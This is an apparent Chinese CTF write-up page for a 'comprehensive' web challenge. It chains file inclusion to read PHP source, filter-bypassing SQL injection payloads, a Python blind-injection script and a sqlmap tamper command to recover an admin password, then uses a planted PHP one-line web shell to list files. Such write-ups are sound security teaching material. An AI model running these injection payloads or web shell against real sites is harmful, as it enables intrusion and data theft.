<!DOCTYPE html>
<!--[if IE 8]><html class="no-js lt-ie9" lang="en" > <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en" > <!--<![endif]-->
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  
  
  <link rel="shortcut icon" href="../../../img/favicon.ico">
  <title>综合2 - 0Xor' CTF WriteUp</title>
  <link href='https://fonts.googleapis.com/css?family=Lato:400,700|Roboto+Slab:400,700|Inconsolata:400,700' rel='stylesheet' type='text/css'>

  <link rel="stylesheet" href="../../../css/theme.css" type="text/css" />
  <link rel="stylesheet" href="../../../css/theme_extra.css" type="text/css" />
  <link rel="stylesheet" href="../../../css/highlight.css">
  
  <script>
    // Current page data
    var mkdocs_page_name = "\u7efc\u54082";
    var mkdocs_page_input_path = "wargame\\web\\[ctf.nuptzj.cn]_zonghe2.md";
    var mkdocs_page_url = "/wargame/web/[ctf.nuptzj.cn]_zonghe2/";
  </script>
  
  <script src="../../../js/jquery-2.1.1.min.js"></script>
  <script src="../../../js/modernizr-2.8.3.min.js"></script>
  <script type="text/javascript" src="../../../js/highlight.pack.js"></script> 
  
</head>

<body class="wy-body-for-nav" role="document">

  <div class="wy-grid-for-nav">

    
    <nav data-toggle="wy-nav-shift" class="wy-nav-side stickynav">
      <div class="wy-side-nav-search">
        <a href="../../.." class="icon icon-home"> 0Xor' CTF WriteUp</a>
        <div role="search">
  <form id ="rtd-search-form" class="wy-form" action="../../../search.html" method="get">
    <input type="text" name="q" placeholder="Search docs" />
  </form>
</div>
      </div>

      <div class="wy-menu wy-menu-vertical" data-spy="affix" role="navigation" aria-label="main navigation">
	<ul class="current">
	  
          
            <li class="toctree-l1">
		
    <a class="" href="../../..">Welcome to 0Xor' WriteUp</a>
	    </li>
          
            <li class="toctree-l1">
		
    <span class="caption-text">Reversing</span>
    <ul class="subnav">
                <li class="">
                    
    <a class="" href="../../../reversing/Moblie/">Moblie</a>
                </li>
                <li class="">
                    
    <a class="" href="../../../reversing/reversing%20misc/">reversing misc</a>
                </li>
                <li class="">
                    
    <span class="caption-text">Encrypt&decrypt</span>
    <ul class="subnav">
                <li class="toctree-l3">
                    
    <a class="" href="../../../reversing/encrypt%26decrypt/%E5%8A%A0%E5%AF%86%E4%B8%8E%E8%A7%A3%E5%AF%86%20%E7%AC%AC%E4%B8%80%E7%AB%A0-%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">加密与解密 第一章 基础知识</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../../reversing/encrypt%26decrypt/%E5%8A%A0%E5%AF%86%E4%B8%8E%E8%A7%A3%E5%AF%86%20%E7%AC%AC%E4%B8%89%E7%AB%A0-%E9%9D%99%E6%80%81%E8%B0%83%E8%AF%95%E6%8A%80%E6%9C%AF/">加密与解密 第三章 静态调试技术</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../../reversing/encrypt%26decrypt/%E5%8A%A0%E5%AF%86%E4%B8%8E%E8%A7%A3%E5%AF%86%20%E7%AC%AC%E4%BA%8C%E7%AB%A0-%E5%8A%A8%E6%80%81%E8%B0%83%E8%AF%95%E6%8A%80%E6%9C%AF/">加密与解密 第二章 动态调试技术</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../../reversing/encrypt%26decrypt/%E5%8A%A0%E5%AF%86%E4%B8%8E%E8%A7%A3%E5%AF%86%20%E7%AC%AC%E5%8D%81%E7%AB%A0-PE%E6%96%87%E4%BB%B6%E6%A0%BC%E5%BC%8F/">加密与解密 第十章 PE文件格式</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../../reversing/encrypt%26decrypt/%E5%8A%A0%E5%AF%86%E4%B8%8E%E8%A7%A3%E5%AF%86%20%E7%AC%AC%E5%9B%9B%E7%AB%A0-%E9%80%86%E5%90%91%E5%88%86%E6%9E%90%E6%8A%80%E6%9C%AF/">加密与解密 第四章 逆向分析技术</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../../reversing/encrypt%26decrypt/%E7%9B%AE%E5%BD%95/">目录</a>
                </li>
    </ul>
                </li>
    </ul>
	    </li>
          
            <li class="toctree-l1">
		
    <span class="caption-text">Wargame</span>
    <ul class="subnav">
                <li class="">
                    
    <span class="caption-text">Crypto</span>
    <ul class="subnav">
                <li class="toctree-l3">
                    
    <a class="" href="../../crypto/%5Bctf.nuptzj.cn%5D_PHP_decode/">[ctf.nuptzj.cn] PHP decode</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../crypto/%5Bctf.nuptzj.cn%5D_base64_N_times/">[ctf.nuptzj.cn] base64 N times</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../crypto/%5Bctf.nuptzj.cn%5D_base64_all/">[ctf.nuptzj.cn] base64 all</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../crypto/%5Bctf.nuptzj.cn%5D_easy/">easy</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../crypto/%5Bctf.nuptzj.cn%5D_keyboard/">[ctf.nuptzj.cn] keyboard</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../crypto/%5Bctf.nuptzj.cn%5D_md5/">[ctf.nuptzj.cn] md5</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../crypto/%5Bctf.nuptzj.cn%5D_mixed_base64/">[ctf.nuptzj.cn] mixed base64</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../crypto/%5Bctf.nuptzj.cn%5D_vigenere/">[ctf.nuptzj.cn] vigenere</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../crypto/%5Bctf.nuptzj.cn%5D_xor/">[ctf.nuptzj.cn] xor</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../crypto/crypto_summary/">Cryto Summary</a>
                </li>
    </ul>
                </li>
                <li class="">
                    
    <span class="caption-text">Misc</span>
    <ul class="subnav">
                <li class="toctree-l3">
                    
    <a class="" href="../../misc/%5Bctf.nuptzj.cn%5D_gif/">[ctf.nuptzj.cn] gif</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../misc/%5Bctf.nuptzj.cn%5D_qiubilong/">丘比龙de女神</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../misc/%5Bctf.nuptzj.cn%5D_tuzhong/">图种</a>
                </li>
    </ul>
                </li>
                <li class="">
                    
    <span class="caption-text">Reversing</span>
    <ul class="subnav">
                <li class="toctree-l3">
                    
    <a class="" href="../../reversing/%5Bbugku.com%5D_ali/">[bugku.com] ali</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../reversing/%5Bctf.nuptzj.cn%5D_ReadAsm2/">[ctf.nuptzj.cn] ReadAsm2</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../reversing/%5Bctf.nuptzj.cn%5D_maze/">[ctf.nuptzj.cn] maze</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../reversing/%5Bctf.nuptzj.cn%5D_py/">[ctf.nuptzj.cn] py</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../reversing/%5Bctf.nuptzj.cn%5D_wxyvm/">[ctf.nuptzj.cn] wxyvm</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../reversing/%5Bctf.nuptzj.cn%5D_wxyvm2/">[ctf.nuptzj.cn] wxyvm2</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../reversing/%5Bwhaleedu.com%5D_dice/">whale-大筛子</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../../reversing/%5Bwhaleedu.com%5D_pyc1/">py逆向1</a>
                </li>
    </ul>
                </li>
                <li class=" current">
                    
    <span class="caption-text">Web</span>
    <ul class="subnav">
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bbugku.com%5D_upload_test/">上传测试</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bbugku.com%5D_web2/">web2</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_20_years/">单身20年</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_aaencode/">aaencode</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_bypass_again/">bypass again</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_cookie/">cookie</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_md5_collision/">md5 collision</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_multi-byte_character/">宽字节注入</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_mysql/">[ctf.nuptzj.cn] mysql</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_pass%20check/">[ctf.nuptzj.cn] pass check</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_php_0x/">起名字真难</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_php_LFI/">[ctf.nuptzj.cn] php LFI</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_php_decode/">[ctf.nuptzj.cn] php decode</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_qiandao/">签到</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_qiandao2/">签到2</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_sql_injection_1/">[ctf.nuptzj.cn] sql injection 1</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_sql_injection_2/">SQL INJECTION 2</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_sql_injection_4/">sql injection 4</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_upload_file/">上传绕过</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_url_redirect/">URL跳转</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_var_override/">变量覆盖</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_web3/">层层递进</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_where_are_you_come_from/">你从哪里来</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_x00/">宽字节注入</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bctf.nuptzj.cn%5D_zonghe/">综合</a>
                </li>
                <li class="toctree-l3 current">
                    
    <a class="current" href="./">综合2</a>
    <ul class="subnav">
            
    <li class="toctree-l4"><a href="#2">综合2</a></li>
    
        <ul>
        
            <li><a class="toctree-l5" href="#_1">题目</a></li>
        
            <li><a class="toctree-l5" href="#_2">解答思路</a></li>
        
            <li><a class="toctree-l5" href="#_3">解题步骤</a></li>
        
        </ul>
    

    <li class="toctree-l4"><a href="#-coding-utf-8-">-- coding: UTF-8 --</a></li>
    
        <ul>
        
            <li><a class="toctree-l5" href="#0x3">0x3 登录后台</a></li>
        
            <li><a class="toctree-l5" href="#_4">漏洞挖掘思路</a></li>
        
            <li><a class="toctree-l5" href="#_5">自动化解析</a></li>
        
        </ul>
    

    </ul>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bshiyanbar.com%5D_add_something/">[shiyanbar.com] add something</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bshiyanbar.com%5D_be_serious/">[shiyanbar.com] be serious</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bshiyanbar.com%5D_forms/">[shiyanbar.com] forms</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bshiyanbar.com%5D_guaiwanmojiao/">[shiyanbar.com] guaiwanmojiao</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bshiyanbar.com%5D_houtaidenglu/">[shiyanbar.com] houtaidenglu</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bshiyanbar.com%5D_post_fast/">[shiyanbar.com] post fast</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bshiyanbar.com%5D_simple_sql_injection/">[shiyanbar.com] simple sql injection</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bshiyanbar.com%5D_simple_sql_injection_2/">[shiyanbar.com] simple sql injection 2</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../%5Bshiyanbar.com%5D_simple_sql_injection_3/">[shiyanbar.com] simple sql injection 3</a>
                </li>
                <li class="toctree-l3">
                    
    <a class="" href="../web_summary/">Web summary</a>
                </li>
    </ul>
                </li>
    </ul>
	    </li>
          
            <li class="toctree-l1">
		
    <span class="caption-text">Web</span>
    <ul class="subnav">
                <li class="">
                    
    <a class="" href="../../../web/sqlmap_learning/">Sqlmap learning</a>
                </li>
    </ul>
	    </li>
          
        </ul>
      </div>
      &nbsp;
    </nav>

    <section data-toggle="wy-nav-shift" class="wy-nav-content-wrap">

      
      <nav class="wy-nav-top" role="navigation" aria-label="top navigation">
        <i data-toggle="wy-nav-top" class="fa fa-bars"></i>
        <a href="../../..">0Xor' CTF WriteUp</a>
      </nav>

      
      <div class="wy-nav-content">
        <div class="rst-content">
          <div role="navigation" aria-label="breadcrumbs navigation">
  <ul class="wy-breadcrumbs">
    <li><a href="../../..">Docs</a> &raquo;</li>
    
      
        
          <li>Wargame &raquo;</li>
        
      
        
          <li>Web &raquo;</li>
        
      
    
    <li>综合2</li>
    <li class="wy-breadcrumbs-aside">
      
    </li>
  </ul>
  <hr/>
</div>
          <div role="main">
            <div class="section">
              
                <h1 id="2">综合2</h1>
<h2 id="_1">题目</h2>
<blockquote>
<p>http://ctf.nuptzj.cn/challenges#%E7%BB%BC%E5%90%88%E9%A2%982</p>
<p>```
Xlcteam客户留言板</p>
<p>欢迎来到Xlcteam客户留言板，各位朋友可以在这里留下对本公司的意见或建议。</p>
<p>本组织主要为企业提供网络安全服务。正如公司名所说，本公司是混迹在“娱乐圈”中的公司，喜欢装B，一直摸黑竞争对手，从未被黑。
  本公司的经营理念为“技术好，算个吊，摸黑对手有一套，坑到学生才叫吊~”。
  你别说不爽我们，有本事来爆我们（科哥）菊花~ come on！！</p>
<p>客户留言：</p>
<p>大秘密:
    交个朋友吧，这个是我微信号 e045e454c18ca8a4415cfeddd1f7375eb0595c71ac00a0e4758761e1cc83f2c565bb09bfd94d1f6c2ffc0fb9849203a14af723b532cbf44a2d6f41b0dee4e834 这是原来管理员说的话，一不小心给覆盖了，sorry！！！欢迎来到xlcteam渗透挑战平台，在这里各位黑阔可以尽情施展你们那牛X的技术和猥琐流的渗透技巧。 （别说SAE没有写权限传不了shell，渗透到后台之后就什么都知道了）。 对了，各位脚本小子就不要拿各种扫描工具猛扫了，也扫不到什么东西的。当然，适当的收集资料还是可以的
t0n9:
    t0n9
ggggg:
    hi
Beta.meee:
    Hacked by meee
sido:
    123
Holden:
    山东红蓝队
小圆圆，小圆圆！:
    hacked by 小圆圆
```</p>
</blockquote>
<h2 id="_2">解答思路</h2>
<ul>
<li>遍历所有页面，查看所有隐藏信息</li>
<li>使用LFI查看所有页面的源代码</li>
</ul>
<h2 id="_3">解题步骤</h2>
<h4 id="0x1">0x1 查看页面底部的链接</h4>
<blockquote>
<h4 id="cms"><a href="http://cms.nuptzj.cn/about.php?file=sm.txt">本CMS说明</a></h4>
</blockquote>
<p>内容如下：</p>
<blockquote>
<p>很明显，这是安装后留下来忘删除的文件。。。 至于链接会出现在主页上，这就要问管理员了。。。 ===============================华丽的分割线============================= 本CMS由Funny公司开发的公司留言板系统，据本技术总监说，此CMS采用国际 顶级的技术所开发，安全性和实用性杠杠滴~</br> 以下是本CMS各文件的功能说明（由于程序猿偷懒，只列了部分文件） config.php：存放数据库信息，移植此CMS时要修改 index.php：主页文件 passencode.php：Funny公司自写密码加密算法库 say.php：用于接收和处理用户留言请求 sm.txt：本CMS的说明文档 sae的information_schema表好像没法检索，我在这里给出admin表结构 create table admin ( id integer, username text, userpass text, ) ======================================================================== 下面是正经的： 本渗透测试平台由：三只小潴(root#zcnhonker.net)&amp; 冷爱(hh250@qq.com)开 发.由你们周老大我辛苦修改，不能题目都被AK嘛，你们说是不是。所以这一题。。你们做出来也算你们吊咯。 </p>
</blockquote>
<p>可以得知：</p>
<ol>
<li>
<p>页面包含的文件如下：</p>
</li>
<li>
<p>config.php</p>
</li>
<li>passencode.php </li>
<li>index.php</li>
<li>say.php</li>
<li>
<p>sm.txt</p>
</li>
<li>
<p>admin的表结构如下：</p>
</li>
</ol>
<p><code>mssql
   create table admin ( id integer, username text, userpass text, )</code></p>
<h4 id="0x2">0x2 依次访问各文件</h4>
<p>通过文件包含的方式（类似http://cms.nuptzj.cn/about.php?file=sm.txt），依次访问各个文件</p>
<ul>
<li>config.php </li>
</ul>
<p>无任何返回值</p>
<ul>
<li>passencode.php </li>
</ul>
<p><code>php+HTML
  &lt;?php function passencode($content){
      $pass=urlencode($content);
      $array=str_split($content);
      $pass=""; 
      for($i=0;$i&lt;count($array);$i++){
          if($pass!=""){
              $pass=$pass." ".(string)ord($array[$i]);}
          else{ 
              $pass=(string)ord($array[$i]);
          } 
      } return $pass;
  }
  ?&gt;</code></p>
<p>这里可以看出密码在数据库的存储方式：将每个字符转化为其ascii码值，以空格为分隔符进行拼接</p>
<ul>
<li>say.php </li>
</ul>
<p>```php+html
  <html>
      <head>
          <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
          <meta http-equiv="Content-Type" content="text/html; charset=utf-8">&lt;?php
          include 'config.php';
          $nice=$_POST['nice'];
          $say=$_POST['usersay'];
          if(!isset($_COOKIE['username'])){
          setcookie('username',$nice);
          setcookie('userpass','');
          }
          $username=$_COOKIE['username'];
          $userpass=$_COOKIE['userpass'];
          if($nice==""|| $say==""){
          echo "<script >alert('昵称或留言内容不能为空！(如果有内容也弹出此框，不是网站问题喔~ 好吧，给个提示：查看页面源码有惊喜！)');</script >";
          exit();
          }
          $con = mysql_connect($db_address,$db_user,$db_pass) or die("不能连接到数据库！！".mysql_error());
          mysql_select_db($db_name,$con);
          $nice=mysql_real_escape_string($nice);</p>
<pre><code>      $username=mysql_real_escape_string($username);
      $userpass=mysql_real_escape_string($userpass);
      $result=mysql_query("SELECT username FROM admin where username='$nice'",$con);
      $login=mysql_query("SELECT * FROM admin where username='$username' AND userpass='$userpass'",$con);
      if(mysql_num_rows($result)&gt;0 &amp;&amp;mysql_num_rows($login)&lt;=0){
      echo "&lt;script &gt;alert('昵称已被使用，请更换！');&lt;/script &gt;";
      mysql_free_result($login);
      mysql_free_result($result);
      mysql_close($con);
      exit();
      }
      mysql_free_result($login);
      mysql_free_result($result);
      $say=mysql_real_escape_string($say);
      mysql_query("insert into message (nice,say,display) values('$nice','$say',0)",$con);
      mysql_close($con);
      echo '&lt;script &gt;alert("构建和谐社会，留言需要经过管理员审核才可以显示！");window.location = "./index.php "&lt;/script &gt;';
      ?&gt;
      &lt;title&gt;&lt;/title&gt;
  &lt;/head&gt;
  &lt;body&gt;
  &lt;/body&gt;
</code></pre>
<p></html>
  ```</p>
<blockquote>
<p>mysql_real_escape_string() 调用mysql库的函数 mysql_real_escape_string, 在以下字符前添加反斜杠: \x00, \n, \r, \, ', " 和 \x1a.</p>
</blockquote>
<ul>
<li>除了sm.txt中提到的文件，还不要忘记<strong>about.php</strong>页面</li>
</ul>
<p>about.php</p>
<p><code>php+html
  &lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt; 
  &lt;?php
  $file = $_GET['file'];
  if ($file == "" || strstr($file, 'config.php')) {
      echo "file参数不能为空！";
      exit();
  } else {
      $cut = strchr($file, "loginxlcteam");
      if ($cut == false) {
          $data = file_get_contents($file);
          $date = htmlspecialchars($data);
          echo $date;
      } else {
          echo "&lt;script&gt;alert('敏感目录，禁止查看！但是。。。')&lt;/script&gt;";
      }
  }
  ?&gt;</code>
  这里注意到<code>loginxlcteam</code>，直接访问<code>/loginxlcteam</code>的页面，该页面为后台管理登录页面</p>
<ul>
<li>在搜索时，会提交到so.php</li>
</ul>
<p>so.php</p>
<p><code>php+html
  &lt;html&gt;
      &lt;head&gt;
          &lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8"&gt;
          &lt;title&gt;
              搜索留言
          &lt;/title&gt;
      &lt;/head&gt;
      &lt;body&gt;
          &lt;center&gt;
              &lt;div id="say" name="say" align="left" style="width:1024px"&gt;
                  &lt;?php
                  if ($_SERVER['HTTP_USER_AGENT'] != "Xlcteam Browser") {
                      echo '万恶滴黑阔，本功能只有用本公司开发的浏览器才可以用喔~';
                      exit();
                  }
                  $id = $_POST['soid'];
                  include 'config.php';
                  include 'antiinject.php';
                  include 'antixss.php';
                  $id = antiinject($id);
                  $con = mysql_connect($db_address, $db_user, $db_pass) or die("不能连接到数据库！！" . mysql_error());
                  mysql_select_db($db_name, $con);
                  $id = mysql_real_escape_string($id);
                  $result = mysql_query("SELECT * FROM `message` WHERE display=1 AND id=$id");
                  $rs = mysql_fetch_array($result);
                  echo htmlspecialchars($rs['nice']) . ':&lt;br /&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;' . antixss($rs['say']) . '&lt;br /&gt;';
                  mysql_free_result($result);
                  mysql_free_result($file);
                  mysql_close($con); ?&gt;
              &lt;/div&gt;
          &lt;/center&gt;
      &lt;/body&gt;
  &lt;/html&gt;</code></p>
<ol>
<li>这里又发现了新的php页面antiinject.php</li>
<li>修改useragent为<code>Xlcteam Browser</code>来访问so.php页面</li>
<li>
<p>这里存在可能的sql注入漏洞，继续查看antiinject.php</p>
</li>
<li>
<p>antiinject.php</p>
</li>
</ol>
<p><code>php+html
   &lt;?php
   function antiinject($content) {
    $keyword = array(
        "select",
        "union",
        "and",
        "from",
        ' ',
        "'",
        ";",
        '"',
        "char",
        "or",
        "count",
        "master",
        "name",
        "pass",
        "admin",
        "+",
        "-",
        "order",
        "="
    );
    $info = strtolower($content);
    for ($i = 0; $i &lt;= count($keyword); $i++) {
        $info = str_replace($keyword[$i], '', $info);
    }
    return $info;
   } ?&gt;</code>
   - 这里发现：</p>
<blockquote>
<p>本网站对部分关键字与空格进行了过滤，因此对于关键词使用双重绕过，空格用/**/代替 </p>
</blockquote>
<ul>
<li>
<p>sql注入语句</p>
<ol>
<li>
<p>在post中提交数据：（这里省略了猜测字段列数的过程）</p>
<p><code>mssql
soid=0/**/unUNIONion/**/seSELECTlect/**/1,userpasPASSs,3,4/**/fFROMrom/**/adADMINmin</code></p>
<p>得到返回：</p>
<blockquote>
<p>102 117 99 107 114 117 110 116 117</p>
</blockquote>
</li>
<li>
<p>使用盲注的方法</p>
<p>编写python脚本</p>
<p>```python</p>
<h1 id="-coding-utf-8-">-<em>- coding: UTF-8 -</em>-</h1>
<p>import requests</p>
<p>def get_db():
    url = "http://cms.nuptzj.cn/so.php"
    header = {
        'User-Agent': 'Xlcteam Browser',
        'Host': 'cms.nuptzj.cn',
    }
    payload1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    result = ""
    for j in range(1, 35):
        for i in payload1:
            char = str(ord(i))
            num = str(j)
            payload = '1/<strong>/aANDnd/</strong>/exists(seSELECTlect/<strong>/*/</strong>/fFROMrom/<strong>/admADMINin/</strong>/where/<strong>/oORrd(substring(userpPASSass/</strong>/frFROMom/<strong>/{0}/</strong>/foORr/<em><em>/1))&gt;{1})'.format(num,char)
            # payload = '1/</em>x</em>/anANDd/<em>x</em>/exists(seleSELECTct/<em>x</em>/<em>/</em>x<em>/frFROMom/</em>x<em>/admiADMINn/</em>x<em>/WHERE/</em>x<em>/oORrd(substring(userpaspasss/</em>x<em>/froFROMm/</em>x<em>/{0}/</em>a<em>/FOorR/</em>a*/1))&gt;{1})'.format(num, char)
            data = {
                    "soid":payload
            }
            response = requests.post(url=url,headers=header,data=data)
            text = response.text
            print text
            # text = str(text)
            result_len = len(text)
            if(result_len &lt; 430):
                result += chr(int(char))
                break
    print(result)</p>
<p>get_db()
```</p>
<p>得到结果：</p>
<blockquote>
<p>1020117099010701140117011001160117</p>
</blockquote>
</li>
<li>
<p>使用sqlmap+tamper</p>
<ul>
<li>[ ] 待实现</li>
<li><strong>nonrecursivereplacement.py</strong>  双重查询语句绕过</li>
</ul>
<p><code>mysql
keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE")</code></p>
<p>在该tamper中只实现了以上几个关键词的双重过滤，而实际情况需要根据过滤的名单来确定，所以其灵活性不够，不知道是否有可以自定义过滤名单的tamper，或者需要自己实现一个该类型的tamper</p>
<ul>
<li><strong>space2comment.py</strong> 用/**/代替空格  </li>
</ul>
<p><code>shell
  sqlmap -u “http://1.1.1.1/a.php?id=1” --tamper="between.py, randomcase.py,space2comment.py" -v 3
  dpkg -L sqlmap | grep tamper (找要引用的脚本)  
  -v 3是为了显示更加详细的内容</code></p>
</li>
</ol>
</li>
<li>
<p>观察得到的结果，联系passencode.php，可以解出password为：fuckruntu </p>
</li>
</ul>
<h4 id="0x3">0x3 登录后台</h4>
<ul>
<li>使用得到的用户名密码登录后台，看到页面</li>
</ul>
<blockquote>
<p>恭喜你已拿下后台，离爆菊只差一步了flag1:nctf{}</p>
<p>能来到这里，相信也不是只会用工具的脚本小子了
现在离爆菊只差一步了
因为程序猿连后台都懒得开发了，为了方便管理，他邪恶地放了一个一句话木马在网站的根目录下
小马的文件名为：xlcteam.php
黑阔，哎哟~不错哦</p>
</blockquote>
<ul>
<li>查看xlcteam.php</li>
</ul>
<pre><code class="php+html">&lt;?php

$e = $_REQUEST['www'];
$arr = array(
    $_POST['wtf'] =&gt; '|.*|e',
);
array_walk($arr, $e, ''); ?&gt;

</code></pre>

<ul>
<li>该页面为php回调函数一句话，使用菜刀连接</li>
</ul>
<p><code>http://cms.nuptzj.cn/loginxlcteam/xlcteam.php?www=str_replace  密码：wtf</code></p>
<p>​   或者提交以下命令：</p>
<pre><code class="php">wtf='print_r(scandir())'   
</code></pre>

<p>​   </p>
<ul>
<li>遍历文件，看到flag相关的txt文件，打开即得到答案</li>
</ul>
<h2 id="_4">漏洞挖掘思路</h2>
<ul>
<li>todo</li>
</ul>
<h2 id="_5">自动化解析</h2>
<ul>
<li>
<p>TODO</p>
</li>
<li>
<p>判断题目特征：<code>web</code> <code>php</code> <code>md5 collision</code></p>
</li>
<li>设定题目难度等级<code>level</code>为simple</li>
<li>提交相应符合要求的字符串</li>
</ul>
              
            </div>
          </div>
          <footer>
  
    <div class="rst-footer-buttons" role="navigation" aria-label="footer navigation">
      
        <a href="../%5Bshiyanbar.com%5D_add_something/" class="btn btn-neutral float-right" title="[shiyanbar.com] add something">Next <span class="icon icon-circle-arrow-right"></span></a>
      
      
        <a href="../%5Bctf.nuptzj.cn%5D_zonghe/" class="btn btn-neutral" title="综合"><span class="icon icon-circle-arrow-left"></span> Previous</a>
      
    </div>
  

  <hr/>

  <div role="contentinfo">
    <!-- Copyright etc -->
    
      <p>0Xor</p>
    
  </div>

  Built with <a href="http://www.mkdocs.org">MkDocs</a> using a <a href="https://github.com/snide/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>.
</footer>
      
        </div>
      </div>

    </section>

  </div>

  <div class="rst-versions" role="note" style="cursor: pointer">
    <span class="rst-current-version" data-toggle="rst-current-version">
      
      
        <span><a href="../%5Bctf.nuptzj.cn%5D_zonghe/" style="color: #fcfcfc;">&laquo; Previous</a></span>
      
      
        <span style="margin-left: 15px"><a href="../%5Bshiyanbar.com%5D_add_something/" style="color: #fcfcfc">Next &raquo;</a></span>
      
    </span>
</div>
    <script>var base_url = '../../..';</script>
    <script src="../../../js/theme.js"></script>
      <script src="../../../search/require.js"></script>
      <script src="../../../search/search.js"></script>

</body>
</html>
